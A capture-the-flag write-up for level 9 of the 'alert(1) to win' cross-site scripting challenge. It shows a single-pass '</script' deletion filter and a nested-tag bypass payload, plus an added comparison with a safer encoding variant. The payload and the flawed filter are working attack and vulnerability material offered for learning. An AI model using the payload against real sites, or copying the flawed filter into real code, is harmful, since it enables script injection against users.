
【alert(1) to win】 Level 09 - JSON 2

 2 years ago
source link: https://exp-blog.com/safe/ctf/alert/level-09-json-2/



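```javascript
function escape(s) {
  // Serialize the input as a JSON string literal, then delete every "</script" in a single pass
  s = JSON.stringify(s).replace(/<\/script/gi, '');

  // The result is embedded inside an inline script element
  return '<script>console.log(' + s + ');</script>';
}
```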

This is an advanced version of Level 03 - JSON.

Recall that the payload for Level 3 was:

```javascript
</script><script>alert(1);//
```

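This level, however, runs one global replace pass over the input string that deletes `</script`, so we can no longer close the tag directly.

But because the replacement runs only once, it is not hard to bypass: just nest `</script` inside itself once, for example `</scr</scriptipt>`. After the global replace, what remains is exactly the closing tag we need, `</script>`.

So the payload for this level can be constructed as: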

```javascript
</scr</scriptipt><script>alert(1);//
```
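Added example, not part of the original post: the level's single-pass filter beside a variant that encodes `<` as `\u003c` instead of deleting a substring, with a check for an early end tag inside the generated element. The names `escapeSinglePass`, `escapeEncoded` and `closesScriptEarly` are chosen here for illustration; the inputs are a benign string and the two payloads quoted above.

```javascript
// The level's filter as shown on the page: one non-recursive pass deleting "</script".
function escapeSinglePass(s) {
  s = JSON.stringify(s).replace(/<\/script/gi, '');
  return '<script>console.log(' + s + ');</script>';
}

// Hardened variant (hypothetical name, added for this example): encode, don't delete.
// "\u003c" is a valid string escape for "<" in JSON and JavaScript, so the logged
// value is identical, but no "<" ever reaches the HTML parser inside the element.
function escapeEncoded(s) {
  const json = JSON.stringify(s).replace(/</g, '\\u003c');
  return '<script>console.log(' + json + ');</script>';
}

// True when the body of the generated element contains an end tag of its own,
// meaning the HTML parser would close the script before the intended "</script>".
function closesScriptEarly(html) {
  const body = html.slice('<script>'.length, html.length - '</script>'.length);
  return /<\/script[\s\/>]/i.test(body);
}

// Inputs: a benign string plus the Level 03 and Level 09 payloads quoted above.
const inputs = [
  'hello',
  '</script><script>alert(1);//',
  '</scr</scriptipt><script>alert(1);//',
];

for (const input of inputs) {
  console.log(JSON.stringify(input));
  console.log('  single pass closes early:', closesScriptEarly(escapeSinglePass(input)));
  console.log('  encoded closes early:    ', closesScriptEarly(escapeEncoded(input)));
}
```

Deleting a blocked substring can reassemble that same substring from the text around it, which is why only the nested input gets through the single pass; encoding the character leaves nothing to reassemble.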

